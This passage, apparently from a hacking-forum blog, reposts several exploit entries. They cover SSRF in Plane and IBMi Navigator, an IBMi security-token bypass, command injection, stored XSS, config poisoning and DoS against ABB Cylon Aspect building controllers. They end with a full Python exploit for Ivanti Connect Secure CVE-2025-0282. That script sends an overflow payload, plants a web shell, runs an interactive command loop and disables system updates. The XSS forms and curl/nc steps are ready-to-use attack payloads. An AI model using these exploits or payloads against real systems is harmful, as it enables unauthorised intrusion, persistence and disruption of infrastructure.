    # Exploit Title: Plane - Server side request forgery (SSRF) # Date: 2024-01-13 # Exploit Author: Saud Alenazi # Vendor Homepage: https://plane.so # Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1 # Version: v0.23.1 # Tested: Windows 10 x64 Description: A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains. Steps to Reproduce: 1- Go to the password recovery or login section where the email input is required. 2- Inject the following payload in the email field, replacing the domain with a server you control: {"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"} Send the request: POST /auth/magic-generate/ HTTP/1.1 Host: 127.0.0.1 Content-Type: application/json Content-Length: 62 {"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"} 3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.
  16. HireHackking

    IBMi Navigator 7.5 - HTTP Security Token Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Author Title: John Page (aka hyp3rlinx) # Author Website: hyp3rlinx.altervista.org # Source: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt # Vendor: www.ibm.com [Product] Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i. IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application. This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser. [Vulnerability Type] HTTP Security Token Bypass [CVE Reference] CVE-2024-51464 [Security Issue] IBM i is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i. The web application generates an HTTP security token ID called "Mn:" with a 19 digit value and is set in the HTTP session response header per user. Navigator, uses this token for integrity purpose to protect against arbitrary and or malicious HTTP requests. Therefore, upon receipt of a bogus security token in an HTTP request the server will respond with HTTP 403 Forbidden message. However, attackers can modify existing tokens to bypass the 403 Forbidden directive to achieve their objectives. Problem is Navigator security token logic does not properly create or detect if a security token is valid or if it has been tampered with. Attackers can manipulate the last eight digits of a token by setting them to all 0000s (zeroes) and or increment them by one, token length must be the same. This can trick the application into processing attacker controlled security tokens as the server thinks it is valid, this undermines the security of this protection. E.g. Valid HTTP header generated by the server. Mn: 6844795211344371559 Content-Length: 290 Origin: https://10.1.1.4:2003 Example of a bogus but honored MN header token set by an attacker, padded with zeros and happily accepted by the backend servlet. Mn: 6844795211300000000 The MN token is generated in the "initProtectionSetting" java method. public void initProtectionSetting(HttpServletRequest request, HttpServletResponse response) { initEncryption(); initSession(); [ REDACTED ] setMagicNumber(magicNumber); response.setHeader("MN", magicNumber + ""); setUserAgent(request.getHeader("User-Agent")); } In the (doFilter) Method we see the check for MN header which sends HTTP 403 on invalid tokens. String mnStr = hRequest.getHeader("MN"); if (mnStr == null) mnStr = hRequest.getParameter("MN"); if (!isMnMatched(mnStr, hSession)) { NavLogger.severe("Forbidden. Incorrect HTTP ID"); NavLogger.info("Request URI: " + requestURI); hResponse.sendError(403); return; Invalid token response will return: Error 403: SRVE38895F: Error reported: 403 Attacker increments MN or pad with zeros and requests are accepted and the token succeeds. HTTP 200 OK [References] ADV0142855 https://www.ibm.com/support/pages/node/7179509 IBM classified as "CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax". To be clear HTTP headers are just the delivery method for sending attacker controlled tokens to bypass Navigator protection. [Exploit/POC] Intercept Navigator HTTP requests and increment the last one or two digits of the Mn: HTTP header security token or just pad the last eight digits with all zeroes. [Network Access] Remote [Severity] Medium CVSS Base score: 4.3 [Affected versions] 7.5.0,7.4.0, 7.3.0 [Disclosure Timeline] Vendor Notification: 10/14/2024 Vendor fix and publication: 12/20/2024 12/27/2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  17. HireHackking

    IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Author Title: John Page (aka hyp3rlinx) # Author Website: hyp3rlinx.altervista.org # Source: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt # Vendor: www.ibm.com [Vendor] www.ibm.com [Product] Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i. IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application. This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser. [Vulnerability Type] Server Side Request Forgery (SSRF) [CVE Reference] CVE-2024-51463 [Security Issue] IBM i is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. post auth server side request forgery on non managed nodes to external hosts on any TCP ports. There are two call vectors that can be abused here, one is the "Test TLS connection" but it only allows connections to TCP port 9476. However, there exists another servlet method called "testConnectPort" which an authenticated attacker can use to connect to any IP and PORT outside of the LAN. This can be abused for port scans, information disclosure, exfil data., bypass firewall rules to attack non managed nodes or connect to attacker controlled C2 infrastructure. This SSRF relies on exploiting a HTTP servlet generated security token bypass CVE-2024-51464, where intercepted HTTP request MN tokens are incremented or padded with zero. This attacker controlled MN token is now seen as valid and the HTTP 403 Forbidden restriction is bypassed. [Exploit/POC] 1) attacker payload POST /Navigator/DispatcherServlet/serviceability/testPortConnection?system=10.1.1.4 {"hostname":"10.2.10.16", "port":445} 2) attackers c2 server ┌──(rootggKali)-[/usr/share] └─# nc -llvp 445 listening on [any] 445 ... connect to [10.2.10.16] from victimhost [10.1.1.4] 44569 For port scan we can infer if external host ports are open or closed using error responses. Port is open: Error 500: Connection reset Port is closed Error 500: A remote host refused an attempted connect [References] ADV0142856 https://www.ibm.com/support/pages/node/7179509 [Affected versions] 7.5.0,7.4.0, 7.3.0 [Network Access] Remote [Severity] Medium CVSS Base score: 5.4 Vendor Notification: 10/14/2024 Vendor fix and publication: 12/20/2024 12/27/2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  18. HireHackking

    ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the contents of an uploaded .db file, which is passed to the copyFile.sh script. Although the filename is sanitized, the contents of the .db file are not, allowing attackers to inject malicious commands that are executed on the server. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5904 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php CVE ID: CVE-2024-48839 CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -s http://192.168.73.31/uploadDb.php \ > -H "Cookie: PHPSESSID=xxx" \ > -F "userfile=@testingus.db" $ curl http://192.168.73.31/database/testingus.db
  19. HireHackking

    ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    ABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated stored cross-site scripting (XSS) vulnerability. This can be exploited by uploading a malicious .txt file containing an XSS payload, which is stored on the server and served back to users. Although the filename is sanitized via the filename POST parameter, the file contents are not inspected or sanitized, allowing attackers to inject arbitrary client-side scripts that execute in the context of any user accessing the infected file or related web page (license.php). To bypass file upload checks, the request must include the Variant string enabling the upload process for potential exploitation. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5905 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php CVE ID: CVE-2024-6516 CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516 21.04.2024 --> P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ <html> <body> <script> function storeit() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.73.31\/licenseUpload.php", true); xhr.setRequestHeader("Accept-Language", "mk-MK,mk;q=0.7"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarymcNoKljWbBWAldlr"); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7"); xhr.withCredentials = true; var body = "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" + "Content-Disposition: form-data; name=\"userfile\"; filename=\"test.txt\"\r\n" + "Content-Type: text/lic\r\n" + "\r\n" + "Variant = AspectMAX\r\n" + "\x3cscript\x3econfirm(251)\x3c/script\x3e\r\n" + "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" + "Content-Disposition: form-data; name=\"submit\"\r\n" + "\r\n" + "Upload\r\n" + "------WebKitFormBoundarymcNoKljWbBWAldlr--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } storeit(); </script> <form action="#"> <input type="button" value="Post" onclick="storeit();" /> </form> </body> </html>
  20. HireHackking

    ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) Stored Cross-Site Scripting Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB BMS/BAS controller suffers from an authenticated stored cross-site scripting vulnerability. Input passed to the 'host' POST parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5906 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5906.php CVE ID: CVE-2024-6516 CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516 21.04.2024 --> P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ <body> <form action="http://192.168.73.31/licenseServerUpdate.php" method="post"> <input type="hidden" name="licenseServer" value="Server" /> <input type="hidden" name="host" value="'><script>confirm(document.domain)</script>" /> <input type="submit" value="Submit" /> </form> </body> </html>
  21. HireHackking

    Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE) # Date: 2025-01-11 # Exploit Author: @absholi7ly # CVE: CVE-2025-0282 import requests import sys import struct import socket import ssl import urllib3 import time # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008): payload = b"A" * offset # Fill the buffer payload += struct.pack("<I", system_address) # Overwrite return address with system() payload += b"BBBB" # Fake return address payload += struct.pack("<I", command_address) # Address of the command payload += command.encode() # Command to execute return payload def send_payload(target_ip, payload): try: context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) ssl_sock = context.wrap_socket(sock, server_hostname=target_ip) ssl_sock.connect((target_ip, 443)) print(f"[+] Connected to {target_ip} on port 443 (HTTPS).") exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi" http_request = ( f"POST {exploit_endpoint} HTTP/1.1\r\n" f"Host: {target_ip}\r\n" f"Content-Length: {len(payload)}\r\n" f"Content-Type: application/x-www-form-urlencoded\r\n" f"\r\n" ).encode() + payload ssl_sock.send(http_request) response = ssl_sock.recv(4096) ssl_sock.close() return response.decode(errors="replace") except Exception as e: print(f"[-] Error sending payload: {e}") return None def exploit_vulnerability(target_ip, command): payload = create_exploit_payload(command) response = send_payload(target_ip, payload) if response: print("[+] Payload sent successfully.") else: print("[-] No response received.") def upload_web_shell(target_ip, local_shell_path): try: with open(local_shell_path, "r") as f: web_shell_content = f.read() command = f"echo '{web_shell_content}' > /shell.php" exploit_vulnerability(target_ip, command) print("[+] Web shell uploaded successfully at /shell.php.") verify_shell(target_ip) except Exception as e: print(f"[-] Error uploading web shell: {e}") def verify_shell(target_ip): shell_url = f"http://{target_ip}/shell.php" try: response = requests.get(shell_url, verify=False, timeout=10) if response.status_code == 200: print("[+] Web shell is accessible.") else: print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}") except Exception as e: print(f"[-] Error verifying web shell: {e}") def execute_shell_command(target_ip, command): shell_url = f"http://{target_ip}/shell.php" try: # Sending the command via POST response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Command output:\n{response.text.strip()}") else: print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}") except Exception as e: print(f"[-] Error executing command via web shell: {e}") def disable_updates(target_ip): commands = [ "systemctl stop apt-daily.service", "systemctl disable apt-daily.service" ] for command in commands: execute_shell_command(target_ip, command) print("[+] System updates disabled successfully.") def main(): if len(sys.argv) != 3: print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>") sys.exit(1) target_ip = sys.argv[1] local_shell_path = sys.argv[2] # Upload the web shell upload_web_shell(target_ip, local_shell_path) while True: command = input("Enter command to execute on the target (or 'exit' to quit): ") if command.lower() == "exit": print("Exiting...") break execute_shell_command(target_ip, command) if __name__ == "__main__": main()
  22. HireHackking

    ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning

    HireHackking posted a blog entry in Hacker Technology
    ABB Cylon Aspect 3.08.02 (webServerUpdate.php) Input Validation Config Poisoning Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB BMS/BAS controller suffers from improper input validation on the port POST parameter in the webServerUpdate.php script. This input is not validated on the server side and relies on bypassable client-side checks using the inString.js script to verify that the port parameter contains only characters from the set (0123456789). Attackers can bypass these checks and supply arbitrary integer values. Exploitation of this issue can result in configuration poisoning, Denial of Service (DoS) through malformed configurations, or manipulation of server settings via Cross-Site Request Forgery (CSRF) combined with authentication bypass. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5901 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5901.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl http://192.168.73.31/webServerUpdate.php \ > -d "port=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" \ > -H "Cookie: PHPSESSID=xxx" <html> <head> <title>The ABB Group</title> <link rel="stylesheet" type="text/css" href="matrixstyle.css"/> </head> <body> <table border="0" cellpadding="0" cellspacing="0" class="workspace" bgcolor="#CCCCCC" width="100%"> <tr> <td width="100%" valign="top"> Web Server settings have been successfully updated.<br><br>Please go to <a href='//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/'>//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/</a> to continue. </td> </tr> </table> <iframe src="webServerUpdateRun.php" style="visibility:hidden;"> </iframe> </body> </html>
  23. HireHackking

    ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)

    HireHackking posted a blog entry in Hacker Technology
    ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: A vulnerability was identified in a PHP script where an off-by-one error in array access could lead to undefined behavior and potential DoS. The issue arises in a loop that iterates over an array using a < condition, allowing access to an out-of-bounds index. This can trigger errors or unexpected behavior when processing data, potentially crashing the application. Successful exploitation of this vulnerability can lead to a crash or disruption of service, especially if the script handles large data sets. This issue can be triggered via the rowCount POST parameter in the Electronic Security Control device update script. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5902 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php CVE ID: CVE-2024-48844 CVE URL: 